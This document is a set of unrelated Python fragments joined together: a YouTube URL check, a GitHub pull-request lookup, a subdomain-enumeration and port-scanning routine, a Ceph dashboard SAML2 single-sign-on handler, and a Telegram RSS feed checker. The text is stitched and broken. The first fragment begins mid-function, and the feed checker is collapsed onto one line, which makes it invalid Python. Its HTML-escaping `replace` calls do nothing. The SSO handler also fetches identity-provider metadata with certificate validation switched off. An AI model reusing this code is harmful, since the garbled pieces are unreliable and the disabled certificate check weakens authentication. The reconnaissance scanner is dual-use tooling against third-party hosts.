    return auth_type, r
def _is_youtube_url(url):
    """Returns true if the URL is to youtube.

    The parsed hostname is compared rather than the raw network location,
    so the check is case-insensitive and is not defeated by an explicit
    port or userinfo (e.g. ``https://WWW.YouTube.com:443/watch``).

    :param url: URL to inspect.
    :return: ``True`` for ``youtu.be``, ``youtube.com`` and
        ``www.youtube.com`` hosts, ``False`` otherwise (including URLs
        without a host part).
    """
    # ``hostname`` is lower-cased and stripped of port/userinfo; it is None
    # when the URL has no network location.
    hostname = urlparse(url).hostname
    return hostname in ("youtu.be", "youtube.com", "www.youtube.com")
# Send log records at the chosen level to a stream handler, formatted as
# "<time> <level>: <message>".
log.setLevel(level)
ch = logging.StreamHandler()
ch.setLevel(level)

format = '%(asctime)s %(levelname)s: %(message)s'
formatter = logging.Formatter(format)

ch.setFormatter(formatter)

log.addHandler(ch)

#--------------------------------------------------------------------

# Pick apart the URL
# NOTE(review): the indexing below assumes the path looks like
# "/<org>/<repo>/pull/<number>" -- confirm against how args.pr is supplied.
parts = urlparse(args.pr)
path = parts.path
vals = path.split('/')
org = vals[1]
repo = vals[2]
pull = vals[3]
num = vals[4]

# Join with "/" explicitly: os.path.join would use the OS path separator
# ("\\" on Windows) and yield a name the repository lookup cannot resolve.
full_name = '/'.join((org, repo))
log.debug("Getting repo {r}...".format(r=full_name))
repo = g.get_repo(full_name)

log.debug("Getting PR {pr}...".format(pr=num))
pr = repo.get_pull(int(num))
log.info("PR {num}: {title}".format(num=num, title=pr.title))
def main(domain, threads, savefile, ports, silent, verbose, enable_bruteforce, engines):
    """Enumerate subdomains of ``domain`` and optionally port-scan them.

    :param domain: domain name to enumerate; must match the validation
        pattern below.
    :param threads: process count handed to the subbrute bruteforce module.
    :param savefile: if truthy, the sorted results are written to this file.
    :param ports: comma-separated port list; if truthy a port scan is run on
        the results instead of printing them.
    :param silent: suppress all console output when truthy.
    :param verbose: passed to the engines and to subbrute; also announced
        on the console unless ``silent``.
    :param enable_bruteforce: run the subbrute module; ``None`` is treated
        as enabled.
    :param engines: comma-separated engine names, or ``None`` for all
        engines.  Unknown names are ignored.
    :return: ``[]`` if ``domain`` is invalid; otherwise the subdomains found,
        sorted with ``subdomain_sorting_key`` (an empty set when nothing was
        found).
    """
    bruteforce_list = set()
    search_list = set()

    if is_windows:
        subdomains_queue = list()
    else:
        subdomains_queue = multiprocessing.Manager().list()

    # Check Bruteforce Status
    if enable_bruteforce or enable_bruteforce is None:
        enable_bruteforce = True

    # Validate domain (raw string: "\-" and "\." are regex escapes, not
    # Python string escapes)
    domain_check = re.compile(r"^(http|https)?[a-zA-Z0-9]+([\-\.]{1}[a-zA-Z0-9]+)*\.[a-zA-Z]{2,}$")
    if not domain_check.match(domain):
        if not silent:
            print(R + "Error: Please enter a valid domain" + W)
        return []

    # Add a scheme only when none is present.  The previous
    # "not http or not https" test was true for every input.
    if not domain.startswith(('http://', 'https://')):
        domain = 'http://' + domain

    parsed_domain = urlparse.urlparse(domain)

    if not silent:
        print(B + "[-] Enumerating subdomains now for %s" % parsed_domain.netloc + W)

    if verbose and not silent:
        print(Y + "[-] verbosity is enabled, will show the subdomains results in realtime" + W)

    supported_engines = {'baidu': BaiduEnum,
                         'yahoo': YahooEnum,
                         'google': GoogleEnum,
                         'bing': BingEnum,
                         'ask': AskEnum,
                         'netcraft': NetcraftEnum,
                         'dnsdumpster': DNSdumpster,
                         'virustotal': Virustotal,
                         'threatcrowd': ThreatCrowd,
                         'ssl': CrtSearch,
                         'passivedns': PassiveDNS
                         }

    chosenEnums = []

    if engines is None:
        chosenEnums = [
            BaiduEnum, YahooEnum, GoogleEnum, BingEnum, AskEnum,
            NetcraftEnum, DNSdumpster, Virustotal, ThreatCrowd,
            CrtSearch, PassiveDNS
        ]
    else:
        engines = engines.split(',')
        for engine in engines:
            if engine.lower() in supported_engines:
                chosenEnums.append(supported_engines[engine.lower()])

    # Start the engines enumeration: start them all, then wait for them all
    enums = [enum(domain, [], q=subdomains_queue, silent=silent, verbose=verbose) for enum in chosenEnums]
    for enum in enums:
        enum.start()
    for enum in enums:
        enum.join()

    subdomains = set(subdomains_queue)
    for subdomain in subdomains:
        search_list.add(subdomain)

    if enable_bruteforce:
        if not silent:
            print(G + "[-] Starting bruteforce module now using subbrute.." + W)
        record_type = False
        path_to_file = os.path.dirname(os.path.realpath(__file__))
        subs = os.path.join(path_to_file, 'subbrute', 'names.txt')
        resolvers = os.path.join(path_to_file, 'subbrute', 'resolvers.txt')
        process_count = threads
        output = False
        json_output = False
        bruteforce_list = subbrute.print_target(parsed_domain.netloc, record_type, subs, resolvers, process_count, output, json_output, search_list, verbose)

    subdomains = search_list.union(bruteforce_list)

    if subdomains:
        subdomains = sorted(subdomains, key=subdomain_sorting_key)

        if savefile:
            write_file(savefile, subdomains)

        if not silent:
            print(Y + "[-] Total Unique Subdomains Found: %s" % len(subdomains) + W)

        if ports:
            if not silent:
                print(G + "[-] Start port scan now for the following ports: %s%s" % (Y, ports) + W)
            ports = ports.split(',')
            pscan = portscan(subdomains, ports)
            pscan.run()

        elif not silent:
            for subdomain in subdomains:
                print(G + subdomain + W)
    return subdomains
def handle_sso_command(cmd):
    """Handle the ``dashboard sso ...`` family of commands.

    :param cmd: command mapping.  ``cmd['prefix']`` selects the action; for
        ``dashboard sso setup saml2`` the mapping must also contain
        ``ceph_dashboard_base_url`` and ``idp_metadata`` and may contain
        ``idp_username_attribute``, ``idp_entity_id``, ``sp_x_509_cert``
        and ``sp_private_key``.
    :return: 3-tuple ``(status, output, error)``: ``status`` is ``0`` on
        success or a negative ``errno`` value, ``output`` carries the
        success message or JSON, ``error`` carries the failure message.
        Unknown prefixes yield ``-errno.ENOSYS``.
    """
    prefix = cmd['prefix']
    handled_prefixes = (
        'dashboard sso enable saml2',
        'dashboard sso disable',
        'dashboard sso status',
        'dashboard sso show saml2',
        'dashboard sso setup saml2',
    )
    if prefix not in handled_prefixes:
        return -errno.ENOSYS, '', ''

    if not python_saml_imported:
        return -errno.EPERM, '', 'Required library not found: `python3-saml`'

    if prefix == 'dashboard sso enable saml2':
        # Constructing the settings object serves as the "is it configured"
        # check: a Saml2Error is reported as "not configured".
        try:
            Saml2Settings(mgr.SSO_DB.saml2.onelogin_settings)
        except Saml2Error:
            return -errno.EPERM, '', 'Single Sign-On is not configured: ' \
                'use `ceph dashboard sso setup saml2`'
        mgr.SSO_DB.protocol = 'saml2'
        mgr.SSO_DB.save()
        return 0, 'SSO is "enabled" with "SAML2" protocol.', ''

    if prefix == 'dashboard sso disable':
        mgr.SSO_DB.protocol = ''
        mgr.SSO_DB.save()
        return 0, 'SSO is "disabled".', ''

    if prefix == 'dashboard sso status':
        if mgr.SSO_DB.protocol == 'saml2':
            return 0, 'SSO is "enabled" with "SAML2" protocol.', ''
        return 0, 'SSO is "disabled".', ''

    if prefix == 'dashboard sso show saml2':
        return 0, json.dumps(mgr.SSO_DB.saml2.to_dict()), ''

    if prefix == 'dashboard sso setup saml2':
        ceph_dashboard_base_url = cmd['ceph_dashboard_base_url']
        idp_metadata = cmd['idp_metadata']
        idp_username_attribute = _get_optional_attr(cmd, 'idp_username_attribute', 'uid')
        idp_entity_id = _get_optional_attr(cmd, 'idp_entity_id', None)
        sp_x_509_cert_path = _get_optional_attr(cmd, 'sp_x_509_cert', '')
        sp_private_key_path = _get_optional_attr(cmd, 'sp_private_key', '')

        # Certificate and private key must be given together or not at all.
        if sp_x_509_cert_path and not sp_private_key_path:
            return -errno.EINVAL, '', 'Missing parameter `sp_private_key`.'
        if not sp_x_509_cert_path and sp_private_key_path:
            return -errno.EINVAL, '', 'Missing parameter `sp_x_509_cert`.'

        has_sp_cert = sp_x_509_cert_path != "" and sp_private_key_path != ""
        sp_x_509_cert = ''
        sp_private_key = ''
        if has_sp_cert:
            try:
                with open(sp_x_509_cert_path, 'r', encoding='utf-8') as cert_file:
                    sp_x_509_cert = cert_file.read()
            except FileNotFoundError:
                return -errno.EINVAL, '', '`{}` not found.'.format(sp_x_509_cert_path)
            try:
                with open(sp_private_key_path, 'r', encoding='utf-8') as key_file:
                    sp_private_key = key_file.read()
            except FileNotFoundError:
                return -errno.EINVAL, '', '`{}` not found.'.format(sp_private_key_path)

        # idp_metadata may be a local file path (deprecated form), a
        # http/https/file URL, or the metadata content itself.
        if os.path.isfile(idp_metadata):
            warnings.warn(
                "Please prepend 'file://' to indicate a local SAML2 IdP file",
                DeprecationWarning)
            with open(idp_metadata, 'r', encoding='utf-8') as metadata_file:
                idp_settings = Saml2Parser.parse(metadata_file.read(),
                                                 entity_id=idp_entity_id)
        elif parse.urlparse(idp_metadata)[0] in ('http', 'https', 'file'):
            idp_settings = Saml2Parser.parse_remote(
                url=idp_metadata, validate_cert=False, entity_id=idp_entity_id)
        else:
            idp_settings = Saml2Parser.parse(idp_metadata, entity_id=idp_entity_id)

        url_prefix = prepare_url_prefix(mgr.get_module_option('url_prefix', default=''))

        # Key order is kept exactly as before because the merged settings
        # are serialized with json.dumps below.
        sp_settings = {
            'entityId': '{}{}/auth/saml2/metadata'.format(ceph_dashboard_base_url, url_prefix),
            'assertionConsumerService': {
                'url': '{}{}/auth/saml2'.format(ceph_dashboard_base_url, url_prefix),
                'binding': "urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
            },
            'attributeConsumingService': {
                'serviceName': "Ceph Dashboard",
                "serviceDescription": "Ceph Dashboard Service",
                "requestedAttributes": [
                    {
                        "name": idp_username_attribute,
                        "isRequired": True
                    }
                ]
            },
            'singleLogoutService': {
                'url': '{}{}/auth/saml2/logout'.format(ceph_dashboard_base_url, url_prefix),
                'binding': 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect'
            },
            "x509cert": sp_x_509_cert,
            "privateKey": sp_private_key
        }

        # Signing/encryption options are switched on only with an SP cert.
        security_settings = dict.fromkeys(
            [
                "nameIdEncrypted",
                "authnRequestsSigned",
                "logoutRequestSigned",
                "logoutResponseSigned",
                "signMetadata",
                "wantMessagesSigned",
                "wantAssertionsSigned",
                "wantAssertionsEncrypted",
            ],
            has_sp_cert)
        security_settings["wantNameIdEncrypted"] = False  # Not all Identity Providers support this.
        security_settings["metadataValidUntil"] = ''
        security_settings["wantAttributeStatement"] = False

        settings = {
            'sp': sp_settings,
            'security': security_settings
        }
        settings = Saml2Parser.merge_settings(settings, idp_settings)
        mgr.SSO_DB.saml2.onelogin_settings = settings
        mgr.SSO_DB.protocol = 'saml2'
        mgr.SSO_DB.save()
        return 0, json.dumps(mgr.SSO_DB.saml2.onelogin_settings), ''

    return -errno.ENOSYS, '', ''
def check_feed(bot, key): feed_url = re.match("^" + feed_hash.format("(.+):subs$"), key).group(1) logger.info(feed_url) data = feedparser.parse(feed_url) if "link" not in data.feed: if "status" in data and data["status"] != 200: logger.warning(_("{0} - Not a valid feed, got HTTP Code {1}").format(feed_url, data["status"])) else: logger.warning(_("{0} - Not a valid feed: {1}").format(feed_url, str(data.bozo_exception))) return None if "title" not in data.feed: feed_title = data.feed["link"] else: feed_title = data.feed["title"] last_entry_hash = feed_hash.format(feed_url + ":last_entry") last_entry = r.get(last_entry_hash) new_entries = utils.get_new_entries(data.entries, last_entry) for entry in reversed(new_entries): if "title" not in entry: post_title = _("No title") else: post_title = utils.remove_html_tags(entry["title"]).strip() post_title = post_title.replace("<", "<").replace(">", ">") if "link" not in entry: post_link = data.link link_name = post_link else: post_link = entry.link feedproxy = re.search("^https?://feedproxy\.google\.com/~r/(.+?)/.*", post_link) # feedproxy.google.com if feedproxy: link_name = feedproxy.group(1) else: link_name = urlparse(post_link).netloc link_name = re.sub("^www\d?\.", "", link_name) # remove www. 
if "content" in entry: content = utils.get_content(entry.content[0]["value"]) elif "summary" in entry: content = utils.get_content(entry.summary) else: content = "" text = "<b>{post_title}</b>\n<i>{feed_title}</i>\n{content}".format( post_title=post_title, feed_title=feed_title, content=content ) readmore = _("Read more on {0}").format(link_name) text += "\n<a href=\"{post_link}\">{readmore}</a>\n".format( post_link=post_link, readmore=readmore ) for member in r.smembers(key): try: bot.sendMessage( chat_id=member, text=text, parse_mode=telegram.ParseMode.HTML, disable_web_page_preview=True ) except telegram.error.Unauthorized: logger.warning(_("Chat {0} doesn't exist anymore, will be deleted.").format(member)) r.srem(key, member) r.delete(feed_hash.format(member)) except telegram.error.ChatMigrated as new_chat: new_chat_id = new_chat.new_chat_id logger.info(_("Chat migrated: ") + member + " -> " + str(new_chat_id)) r.srem(key, member) r.sadd(key, new_chat_id) r.rename(feed_hash.format(member), feed_hash.format(new_chat_id)) bot.sendMessage( chat_id=member, text=text, parse_mode=telegram.ParseMode.HTML, disable_web_page_preview=True ) except telegram.error.TimedOut: pass except telegram.error.BadRequest as exception: logger.error(exception) if not r.exists(key): r.delete(last_entry_hash) return # Set the new last entry if there are any if new_entries: if "id" not in new_entries[0]: new_last_entry = new_entries[0].link else: new_last_entry = new_entries[0].id r.set(last_entry_hash, new_last_entry)